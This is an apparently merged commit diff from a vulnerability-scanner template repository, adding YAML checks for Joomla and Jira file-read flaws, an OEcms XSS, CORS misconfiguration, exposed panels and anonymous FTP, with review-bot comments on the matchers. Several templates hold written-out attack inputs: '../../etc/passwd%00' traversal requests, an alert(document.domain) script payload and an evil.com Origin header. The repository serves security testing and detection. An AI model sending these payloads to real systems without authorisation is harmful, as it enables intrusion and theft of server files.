Merge remote-tracking branch 'origin' into dynamic_attributes

patch-1
forgedhallpass 2021-08-26 15:04:14 +03:00
commit a4250b8f2f
29 changed files with 1257 additions and 761 deletions


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 |
| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 |
| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 |
| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 |
| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | |
| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | |
| rce | 189 | gy741 | 71 | takeovers | 71 | | | | |
| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 |
| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 |
| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 |
| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | |
| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 189 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | |
| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | |
| cve2021 | 103 | pussycat0x | 42 | workflows | 35 | | | | |
| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | |
| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | |
**146 directories, 1940 files**.
**146 directories, 1962 files**.
</td>
</tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff


@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 |
| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 |
| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 |
| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 |
| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | |
| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | |
| rce | 189 | gy741 | 71 | takeovers | 71 | | | | |
| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 |
| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 |
| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 |
| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | |
| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 189 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | |
| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | |
| cve2021 | 103 | pussycat0x | 42 | workflows | 35 | | | | |
| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | |
| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | |


@ -0,0 +1,27 @@
id: CVE-2010-1306
info:
name: Joomla! Component Picasa 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12058
- https://www.cvedetails.com/cve/CVE-2010-1306
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
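Review bot: The regex matcher `root:.*:0:0` is loose for a passwd check: `.*` is greedy and the pattern is unanchored, so any body line that contains `root:` and later `:0:0` satisfies it. Tightening it to the passwd field layout, for example `- "root:[^:]*:0:0:"`, keeps the match on a real passwd entry and lowers false positives on pages that merely echo part of the request. The same matcher appears in the CVE-2010-1954 template added in this commit and would benefit from the same change. Both requests end in `%00`, so the check presumably only fires where the null byte still truncates the path; a sentence in `description` saying so would help when triaging negative results.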


@ -0,0 +1,27 @@
id: CVE-2010-1954
info:
name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12287
- https://www.cvedetails.com/cve/CVE-2010-1954
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,33 @@
id: CVE-2018-12095
info:
name: OEcms 3.1 - Cross-Site Scripting
author: LogicalHunter
severity: medium
description: A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php.
reference:
- https://www.exploit-db.com/exploits/44895
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095
- https://cxsecurity.com/issue/WLB-2018060092
tags: cve,cve2018,xss
requests:
- method: GET
path:
- '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -2,7 +2,7 @@ id: CVE-2019-15501
info:
name: LSoft ListServ - XSS
author: Borna Nematzadeh
author: LogicalHunter
severity: medium
reference:
- https://www.exploit-db.com/exploits/47302


@ -2,7 +2,7 @@ id: CVE-2019-8937
info:
name: HotelDruid 2.3.0 - XSS
author: Borna Nematzadeh
author: LogicalHunter
severity: medium
refrense: https://www.exploit-db.com/exploits/46429
tags: cve,cve2019,xss,hoteldruid
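Review bot: The `refrense:` key on the unchanged line below `severity` is misspelled, so the exploit-db link is presumably not picked up by anything that reads the `reference` field. This hunk already touches the `info` block, so it is a natural place to fix it: `reference: https://www.exploit-db.com/exploits/46429`. The template body continues outside the hunk.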


@ -0,0 +1,29 @@
id: CVE-2021-26086
info:
name: Jira Limited Local File Read
author: cocxanh
severity: medium
description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
reference:
- https://jira.atlassian.com/browse/JRASERVER-72695
- https://nvd.nist.gov/vuln/detail/CVE-2021-26086
tags: cve,cve2021,jira,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<web-app"
- "</web-app>"
part: body
condition: and


@ -17,17 +17,20 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}/login/showlogin"
- "{{BaseURL}}"
headers:
Host: "{{randstr}}.tld"
matchers-condition: and
matchers:
- type: regex
regex:
- (EXPONENT\.(?:(?:J(?:QUERY|S)_UR|URL_FUL)|YUI2_UR)L=")?https?://{{randstr}}\.tld
- type: word
words:
- '{{randstr}}.tld'
- 'EXPONENT.PATH'
- 'EXPONENT.URL'
part: body
condition: and
- type: status
status:


@ -1,4 +1,4 @@
id: can-i-take-over-dns
id: can-i-take-over-dns-fingerprint
info:
name: Can I Take Over DNS - Fingerprint


@ -0,0 +1,32 @@
id: epson-unauthorized-access-detect
info:
name: Epson Printer
author: pussycat0x
severity: medium
reference: https://www.exploit-db.com/ghdb/6922
tags: iot,printer,panel,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/PRESENTATION/EPSONCONNECT"
matchers-condition: and
matchers:
- type: word
words:
- "Epson Connect"
- "/IMAGE/EPSONLOGO.PNG"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "<title>([A-Z-0-9]+) Series</title>"
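Review bot: `name: Epson Printer` is used by both this template and `epson-web-control-detect` added in the same commit, so results from the two cannot be told apart by name. Nothing in `info` explains why this one is rated `medium` while the other is `info`. A `description` stating what is reachable without authentication at `/PRESENTATION/EPSONCONNECT`, plus a distinct name such as `name: Epson Connect Panel - Unauthenticated Access`, would make the finding triageable. In the extractor, the class `[A-Z-0-9]` reads like a malformed range; `[A-Z0-9-]` expresses the same set unambiguously.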


@ -0,0 +1,25 @@
id: epson-web-control-detect
info:
name: Epson Printer
author: pussycat0x
severity: info
reference: https://www.exploit-db.com/ghdb/6873
tags: iot,printer,panel,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/home"
matchers-condition: and
matchers:
- type: word
words:
- "Epson Web Control"
- "Basic Control"
- "Advanced"
condition: and
- type: status
status:
- 200


@ -0,0 +1,23 @@
id: honeywell-web-controller
info:
name: Honeywell XL Web Controller
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7130
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}/standard/default.php'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Honeywell XL Web Controller</title>'
- type: status
status:
- 200


@ -0,0 +1,23 @@
id: ibm-note-login
info:
name: IBM iNotes Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7122
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/names.nsf'
matchers-condition: and
matchers:
- type: word
words:
- '<title>IBM iNotes Login</title>'
- type: status
status:
- 200


@ -0,0 +1,31 @@
id: lacie-panel
info:
name: LaCie Login Panel
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7118
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/dashboard/'
matchers-condition: and
matchers:
- type: word
words:
- 'id_LaCie'
part: body
- type: regex
regex:
- '(?m)<title>([a-zA-Z0-9&#; ]|)+Dashboard<\/title>$'
part: body
- type: status
status:
- 200
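Review bot: The title regex `(?m)<title>([a-zA-Z0-9&#; ]|)+Dashboard<\/title>$` wraps an empty alternative in a repeated group, which is an obscure way of writing `[a-zA-Z0-9&#; ]*`. It is also the kind of construct that backtracking regex engines handle badly if the pattern is ever reused outside nuclei. The trailing `$` requires `</title>` to be the last thing on its line, so a page that puts the next tag on the same line is missed even when `id_LaCie` is present. I would write it as `- '<title>[a-zA-Z0-9&#; ]*Dashboard</title>'`.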


@ -0,0 +1,22 @@
id: web-service-panel
info:
name: WEB SERVICE Panel
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7116
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>WEB SERVICE</title>'
- type: status
status:
- 200
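Review bot: The only content check is the page title `<title>WEB SERVICE</title>` at `{{BaseURL}}`, and neither the `id` nor the `name` says which product this panel belongs to. A title that generic is likely to match unrelated hosts, and whoever triages the result has only the GHDB link to go on. Add a `description` naming the product and, if the panel exposes one, a second product-specific body string in the `words` list with `condition: and`.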


@ -0,0 +1,30 @@
id: axis-happyaxis
info:
name: Axis Happyaxis Exposure
author: dogasantos
severity: info
tags: axis,axis2,middleware,exposure,apache
requests:
- method: GET
path:
- "{{BaseURL}}/axis2/axis2-web/HappyAxis.jsp"
- "{{BaseURL}}/axis/happyaxis.jsp"
- "{{BaseURL}}/axis2-web/HappyAxis.jsp"
- "{{BaseURL}}/happyaxis.jsp"
matchers-condition: and
matchers:
- type: word
words:
- "Axis Happiness Page"
- "Axis2 Happiness Page"
- "Examining Application Server"
- "Examining Version Service"
- "Examining System Properties"
condition: or
- type: status
status:
- 200


@ -0,0 +1,33 @@
id: glpi-status-domain-disclosure
info:
name: GLPI Status Domain Disclosure
author: dogasantos
severity: info
tags: glpi,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/status.php"
- "{{BaseURL}}/glpi/status.php"
- "{{BaseURL}}/glpi2/status.php"
matchers-condition: and
matchers:
- type: word
words:
- "GLPI_"
- "LDAP server"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '((\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})|([a-zA-Z0-9]+(\.[a-zA-Z0-9]{2,3}){1,2}))'
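Review bot: The extractor regex is not tied to the part of the response it is meant to report. Its second alternative `[a-zA-Z0-9]+(\.[a-zA-Z0-9]{2,3}){1,2}` accepts any token followed by a dot and two or three alphanumerics, which includes file names such as `status.php` and version-like strings. With `group: 1` covering the whole expression, every such token in the body ends up in the output. Anchoring the pattern on the label that precedes the host in the status output (the matcher already requires `LDAP server`) would limit extraction to the disclosed hosts; the exact response format is not visible here, so the anchor needs checking against a real response. The template also has no `description` or `reference` explaining what is disclosed.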


@ -0,0 +1,25 @@
id: glpi-telemetry-disclosure
info:
name: GLPI Telemetry Disclosure
author: dogasantos
severity: info
tags: glpi,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/ajax/telemetry.php"
- "{{BaseURL}}/glpi/ajax/telemetry.php"
matchers-condition: and
matchers:
- type: word
words:
- '"uuid":'
- '"glpi":'
condition: and
- type: status
status:
- 200


@ -1,9 +1,9 @@
id: ftp-default-credentials
info:
name: FTP Service with default credentials
name: FTP Service with anonymous Login
author: pussycat0x
severity: low
severity: info
tags: network,ftp,default-login
network:
@ -18,3 +18,5 @@ network:
- type: word
words:
- "230"
- "Anonymous user logged in"
condition: and
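Review bot: The added word `"Anonymous user logged in"` combined with `condition: and` appears to make the match depend on one server's wording of the 230 reply. Servers that accept the anonymous login with a different message (for example a plain `230 Login successful.`) would then no longer be reported. If the goal is to cut false positives from a bare `230` substring, a regex matcher on the reply code at the start of a line, such as `- '(?m)^230[ -]'`, does that without a product-specific sentence. The id `ftp-default-credentials` and the `default-login` tag also no longer agree with the new name `FTP Service with anonymous Login`. The matcher block starts outside the second hunk.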


@ -0,0 +1,31 @@
id: apache-axis-detect
info:
name: apache-axis-detect
author: dogasantos
severity: info
description: Axis and Axis2 detection
tags: tech,axis2,middleware,apache
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/axis2/"
- "{{BaseURL}}/axis/"
matchers-condition: and
matchers:
- type: word
words:
- "Validate"
- "Welcome"
- "Axis"
- "deployed"
- "installation"
- "Admin"
condition: and
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: glpi-cms-detect
info:
name: GLPI Cms Detection
author: dogasantos
severity: info
tags: glpi,cms,php
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/glpi/"
- "{{BaseURL}}/glpi2/"
matchers-condition: and
matchers:
- type: word
words:
- "CFG_GLPI"
- "_glpi_csrf_token"
- "GLPI Copyright"
condition: and
- type: status
status:
- 200


@ -0,0 +1,23 @@
id: synology-web-station
info:
name: Synology Web Station
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7125
tags: tech
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Hello! Welcome to Synology Web Station!</title>'
- type: status
status:
- 200


@ -1,22 +0,0 @@
id: basic-cors-misconfig
info:
name: Basic CORS misconfiguration
author: nadino
severity: info
tags: cors,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
Origin: https://evil.com
matchers:
- type: word
words:
- "Access-Control-Allow-Origin: https://evil.com"
- "Access-Control-Allow-Credentials: true"
condition: and
part: header


@ -0,0 +1,66 @@
id: cors-misconfig
info:
name: Basic CORS misconfiguration
author: nadino,G4L1T0,convisoappsec,pdteam
severity: info
reference: https://portswigger.net/web-security/cors
tags: cors,generic
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET / HTTP/1.1
Host: {{Hostname}}
Origin: {{randstr}}.com
- |
GET / HTTP/1.1
Host: {{Hostname}}
Origin: null
# - |
# GET / HTTP/1.1
# Host: {{Hostname}}
# Origin: {{randstr}}.{{Hostname}}
#
# - |
# GET / HTTP/1.1
# Host: {{Hostname}}
# Origin: {{Hostname}}{{randstr}}
# TO DO for future as currently {{Hostname}} is not supported in matchers
matchers-condition: or
matchers:
- type: dsl
name: arbitrary-origin
dsl:
- "contains(tolower(all_headers), 'access-control-allow-origin: {{randstr}}.com')"
- "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
condition: and
- type: dsl
name: null-origin
dsl:
- "contains(tolower(all_headers), 'access-control-allow-origin: null')"
- "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
condition: and
- type: dsl
name: wildcard-acac
dsl:
- "contains(tolower(all_headers), 'access-control-allow-origin: *')"
- "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
condition: and
- type: dsl
name: wildcard-no-acac
dsl:
- "contains(tolower(all_headers), 'access-control-allow-origin: *')"
- "!contains(tolower(all_headers), 'access-control-allow-credentials: true')"
condition: and
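Review bot: In the `arbitrary-origin` matcher the response headers are lower-cased with `tolower(all_headers)` but the expected string embeds `{{randstr}}` as-is, so if the generated value contains upper-case characters the comparison can never succeed and a reflecting server goes unreported. Lower-casing both sides fixes that: `- "contains(tolower(all_headers), tolower('access-control-allow-origin: {{randstr}}.com'))"`. Separately, `Origin: {{randstr}}.com` carries no scheme, unlike the `https://evil.com` value in the template this one replaces. Servers that parse the header before reflecting it may ignore a value that is not a serialized origin, so `Origin: https://{{randstr}}.com` (with the matcher string updated to match) is closer to what a browser sends. The `wildcard-no-acac` matcher will also fire on every public resource that sends `Access-Control-Allow-Origin: *`, which is worth stating in a `description` so the result is not read as a finding by itself.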


@ -21,7 +21,7 @@ requests:
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com'
- '{{BaseURL}}bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
matchers-condition: and
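Review bot: With the missing `/` restored, the corrected `{{BaseURL}}/bitrix/redirect.php?...&goto=https://example.com` entry looks identical to the path on the line that follows it, so the same request would be sent twice per target. If that following line is an unchanged entry rather than a rendering artefact of this page, delete the formerly broken line instead of correcting it. The `path` list starts outside the hunk.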


@ -21,6 +21,8 @@ requests:
words:
- 'sqli-test'
- 'attribute_counts'
- 'price_range'
- 'term'
condition: and
- type: word